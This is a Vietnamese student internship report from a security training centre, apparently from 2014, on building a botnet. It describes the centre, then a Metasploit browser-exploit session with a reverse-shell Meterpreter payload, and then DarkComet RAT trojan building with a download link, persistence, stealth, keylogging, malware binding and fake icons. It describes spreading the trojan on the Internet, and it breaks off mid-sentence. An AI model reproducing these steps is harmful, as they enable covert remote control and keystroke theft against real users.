SlideShare a Scribd company logo
1 of 32
Download to read offline
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
ĐỀ TÀI:
Nghiên cứu và triển khai mạng lưới
zombie , botnet trên hệ thống mạng
GVHD : Võ Đỗ Thắng
SVTT: Hồ Quốc Nghị
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
2Trang
LỜI CẢM ƠN
  
Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào
Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào
Tạo Athena .Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng khóa, đến
nay em đã hoàn thành xong đề tài: “Nghiên cứu và triển khai mạng lưới zoombie ,
botnet trên hệ thống mạng”.
Để có được kết quả này, em xin chân thành cám ơn Thầy Võ Đỗ Thắng đã
quan tâm hướng dẫn cho em trong suốt quá trình hoàn thành đề tài này.
Vì thời gian có hạn cũng như kinh nghiệm còn thiếu nên đề tài của em không
tránh khỏi những thiếu sót. Em rất mong nhận được sự chỉ bảo, đóng góp ý kiến
của thầy để em có điều kiện bổ sung và có thể hoàn thành tốt đề tài của mình hơn.
Sinh viên thực tập
Hồ Quốc Nghị
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
3Trang
NHẬN XÉT TRUNG TÂM ATHENA
  
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
TP.HCM, ngày …. tháng …. năm 2014
Giáo viên hướng dẫn
Võ Đỗ Thắng
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
4Trang
MỤC LỤC
I. LỜI MỞ ĐẦU.......................................................................................6
1. Sự cần thiết của đề tài ........................................................................................... 6
2. Mục tiêu nghiên cứu.............................................................................................. 6
3. Phương pháp nghiên cứu ...................................................................................... 6
II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA.............7
1. Sơ lược trung tâm.................................................................................................. 7
2. Trụ sở và các chi nhánh và thông tin liên hệ.......................................................... 7
a. Trụ sở chính............................................................................................................................7
b. Cơ sở tại HCM.........................................................................................................................8
c. Thông tin liên hệ.....................................................................................................................8
3. Quá trình hình thành và phát triển ........................................................................ 8
4. Cơ cấu tổ chức....................................................................................................... 9
5. Các khóa học của trung tâm Athena .................................................................... 10
a. Các khóa học dài hạn...........................................................................................................10
b. Các khóa học ngắn hạn........................................................................................................10
c. Các sản phẩm khác ..............................................................................................................11
d. Cơ sở hạ tầng .......................................................................................................................11
e. Các dịch vụ hỗ trợ.................................................................................................................11
6. Khách hàng của Athena ....................................................................................... 11
7. Đối tác của Athena............................................................................................... 12
8. Đội ngũ giảng viên của trung tâm đào tạo Athena ............................................... 12
III. GIỚI THIỆU VỀ BACKTRACK 5..........................................................13
1. Giới thiệu............................................................................................................. 13
2. Mục đích.............................................................................................................. 13
3. Cài đặt ................................................................................................................. 14
a. Cài đặt trong máy thật ........................................................................................................14
b. Cài đặt trong máy ảo...........................................................................................................14
IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN...........................................21
1. Triển khai trong môi trường LAN ......................................................................... 21
2. Thử nghiệm xâm nhập bằng Metasploit .............................................................. 22
V. XÂY DỰNG BONET BẰNG DARKCOMET...........................................24
3. Giới thiệu DarkComet .......................................................................................... 24
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
5Trang
4. Cài đặt DarkComet............................................................................................... 24
VI. HƯỚNG PHÁT TRIỂN ...................................................................... 31
VII. KẾT LUẬN.......................................................................................31
VIII. TÀI LIỆU THAM KHẢO ..................................................................32
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
6Trang
I. LỜI MỞ ĐẦU
1. Sự cần thiết của đề tài
Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial
of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất.
DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ
thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận
và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7
năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi
Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập
được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014
có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp
hơn hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các
hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến
hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet
sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng
ngừa sự phát triển của hệ thống zombie, botnet.
2. Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1:
Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong
mạng, thử xâm nhập trên các máy.
Giai đoạn 2:
Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển
mạng lưới botnet thông qua mạng Internet.
3. Phương pháp nghiên cứu
Giai đoạn 1:
Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack
trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một
mục tiêu.
Giai đoạn 2:
Cài đặt và tạo bot bằng DarkComet trên VPS (Virtual Private Server) và phát tán
trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public
của VPS.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
7Trang
II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA
1. Sơ lược trung tâm
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương
hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo
giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh
cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần
vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang
tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo
cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ
Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc
biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các
tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ
sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy
ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều
bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở
Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công
nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học
Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an
toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
2. Trụ sở và các chi nhánh và thông tin liên hệ
a. Trụ sở chính
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
8Trang
b. Cơ sở tại HCM
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam
c. Thông tin liên hệ
Điện thoại: ( 84-8 ) 3824 4041
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 23 00 99
Website: www.Athena.Edu.Vn
3. Quá trình hình thành và phát triển
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền
công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao
và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ
thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ
thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá
nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ
công nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
- Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
- Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty
EIS, Phó Tổng công ty FPT.
- Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
- Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính
gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính
miền Nam.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài
đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp
về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử,
bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học.
Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ
giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ
thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004,
công ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung
thông qua việc thành lập văn phòng đại diện tại Đà Nẵng.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
9Trang
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ
giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và
học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này
Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ
thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng
viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc
lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào
nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi
công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi
nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa
làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm
khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học
hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm
giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa
chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với
quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó
khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung
tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt
động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào
tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty,
tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân
lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào
tiến trình tin học hóa nước nhà.
4. Cơ cấu tổ chức
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
10Trang
5. Các khóa học của trung tâm Athena
a. Các khóa học dài hạn
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator
b. Các khóa học ngắn hạn
- Quản trị mạng Microsoft căn bản ACBN .
- Phần cứng máy tính, laptop, server .
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE.
- Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012.
- Lớp Master Exchange Mail Server.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
11Trang
- Quản trị mạng quốc tế Cissco CCNA.
- Quản trị hệ thống mạng Linux 1 và Linux 2.
- Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart.
- Lập trình web với Php và MySQL.
- Bảo mật mạng quốc tế ACNS.
- Hacker mũ trắng .
- Athena Mastering Firewall Security.
- Bảo mật website.
c. Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu.
- Chuyên đề thực hành bảo mật mạng Wi_Fi.
- Chuyên đề Ghost qua mạng.
- Chuyên đề xây dựng và quản trị diễn đàn.
- Chuyên đề bảo mật dữ liệu phòng chống nội gián.
- Chuyên đề quản lý tài sản công nghệ thông tin .
- Chuyên đề kỹ năng thương mại điện tử.
d. Cơ sở hạ tầng
- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
e. Các dịch vụ hỗ trợ
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng.
- Hỗ trợ thi Chứng chỉ Quốc tế.
6. Khách hàng của Athena
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
12Trang
7. Đối tác của Athena
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự
CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các
đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
8. Đội ngũ giảng viên của trung tâm đào tạo Athena
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học
hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ
quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm
Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc
để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.
Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức
công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm
ATHENA.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
13Trang
III. GIỚI THIỆU VỀ BACKTRACK 5
1. Giới thiệu
Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y
kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn
gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào
thử nghiệm thâm nhập: WHAX và Auditor Security Collection
2. Mục đích
Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập.
Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để
có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang
web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên
internet,mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm
tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và
cũng làm portscanning.
Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công
cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các
công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple
Network Management Protocol (SNMP).
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID).
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc
quyền của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy
trì quyền truy cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
14Trang
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp
trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn
khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin
trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ
rối chương trình một hoặc tháo rời một tập tin thực thi.
3. Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
a. Cài đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack
Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau
đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack
5.
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop
và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử
dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó
cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang
sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt
b. Cài đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng
đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless
trừ USB wireless.
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây
chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong
file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được
card mạng thật, ta phải chọn Netword là Briged
Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare:
Vmware Workstation 9
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
15Trang
Tạo một máy ảo mới và cho đĩa BackTrack vào
Giao diện khởi động của BackTrack
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
16Trang
Gõ startx để vào chế độ đồ họa trong BackTrack
Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
17Trang
Chọn ngôn ngữ, chọn Tiếp để tiếp tục
Chọn múi giờ, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
18Trang
Chọn ngôn ngữ bàn phím, chọn Tiếp để tiếp tục
Chọn phân vùng để cài, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
19Trang
Nhấn Cài đặt để bắt đầu cài
Quá trình cài đã bắt đầu.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
20Trang
Sau khi hoàn tất, chỉ việc khởi động lại là xong.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
21Trang
IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN
1. Triển khai trong môi trường LAN
VMware Workstation chuẩn bị sẵn cho chúng ta 10 Switch ảo. Trong số đó,
VMnet0, VMnet1 và VMnet8 được dùng để kết nối với một vài thiết bị đặc biệt
khác như Virtual Bridge, Virtual NAT Device, DHCP Server. Trong khuôn khổ bài
này, ta sẽ sử dụng VMnet0 để thiết lập mạng cho các máy ảo trong VMware.
VMnet0 là một Switch ảo được kết nối với Bridge ảo để liên lạc ra ngoài mạng
thật. Các máy tính ảo nếu được cấu hình card mạng kết nối vào VMnet0 thì có thể
tham gia vào việc liên lạc, chia sẻ dữ liệu với các máy thật ở mạng ngoài. Nếu
mạng ngoài chúng ta có kết nối với Router ADSL, có cấu hình cấp IP động trên
Router thì các máy ảo sẽ nhận được IP từ Router như một máy tính thật. Mặc
định, VMWare sẽ tự chọn card mạng trên máy thật mà có kết nối ra mạng ngoài.
Tuy nhiên nếu máy các bạn có nhiều hơn 2 card mạng thật thì chúng ta có thể lựa
chọn lại cho phù hợp bằng cách điều chỉnh trong Virtual Network Editor > tab Host
Virtual Network Mapping> VMnet0.
Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network
Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged.
Làm tương tự với các máy ảo khác.
Như vậy, sau khi cấu hình xong, các máy ảo được cấp địa chỉ IP như máy thật.
Và do đó, các máy ảo thuộc về cùng một mạng LAN, và chung mạng LAN với cả
máy thật đang chạy VMware.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
22Trang
Mô hình mạng LAN được mô phỏng:
2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.
Công cụ này có database rất lớn, về các lỗi tồn tại trên các hệ điều hành và cách
tấn công.
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ msfconsole.
Giao diện chương trình:
Khi dấu nhắc trở thành msf> , chúng ta có thể sử dụng chương trình.
Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms12_004
use exploit/windows/browser/ms12_004_midi -> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.0.126
set LHOST 192.168.0.126
exploit
Switch
PC1 PC2 PC3
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
23Trang
Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc
(http://192.168.0.126:8080/OXRIFK6vPY), chỉ cần nạn nhân click vào link thì mã
độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
24Trang
V. XÂY DỰNG BONET BẰNG DARKCOMET
3. Giới thiệu DarkComet
DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất
nổi tiếng, được tạo ra để điều khiển bất kì máy Microsoft Windows nào. DarkComet
có khả năng điều khiển truy cập từ xa, quả lí tập tin, giám sát (keyloger, chụp ảnh
màn hình, xem webcame,..), các chức năng mạng,..
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
4. Cài đặt DarkComet
Dự án DarkComet RAT đã chính thức đóng vào tháng 6 năm 2012, các bản chính
thức trên trang http://www.darkcomet-rat.com đã được gỡ xuống. Bản DarkComet
dùng trong phần này là bản DarkComet Rat 5.3.1, được download từ
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.
Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT. Mở terminal,
chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine
darkcomet để khởi động DarkComet:
wine darkcomet
Giao diện quản lí của DarkComet:
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
25Trang
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen)
Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:
Download DarkComet
Giải nén file DarkComet531RAT.zip vào thư mục DarkComet.
Vào thư mục DarkComet, chạy file DarkComet.exe
Vào DarkComet -> Server module:
Chọn Minimalist nếu muốn dùng các tùy chọn mặc định
Chọn Full Editor nếu muốn tùy chỉnh tất cả tùy chọn.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
26Trang
Giao diện full editor:
Các cài đặt:
- Main settings
Cài đặt password, server ID, profile name và tùy chọn bypass tường lửa
- Network Settings
Cài đặt IP và cổng lắng nghe của server.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
27Trang
- Module Startup
Tùy chọn trojan có khởi động cùng Windows hay không.
- Install Message
Tùy chọn có hiển thị hộp thoại thông báo khi nạn nhân chạy chương trình
trojan hay không.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
28Trang
Module Shield:
Các tùy chọn giúp trojan ẩn mình.
- Keylogger
Tùy chọn ghi log bàn phím, địa chỉ tải log.
- File Binder
Tùy chọn đính kèm file khác. Với tùy chọn này, trojan có thể mang theo một
hoặc nhiều file mã độc, cài đặt các file mã độc này khởi động cùng
Windows.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
29Trang
- Choose Icon
Tùy chọn một icon giả để đánh lừa nạn nhân.
- Stub Finalization
Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn
cách nén file trojan và lưu các cài đặt để sử dụng lại.
Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo
trojan. Với trojan vừa được tạo, ta có thể phát tán lên internet. Khi một người dùng
internet down trojan về và mở ra thì sẽ có kết nối về server, lúc đó dựa vào giao
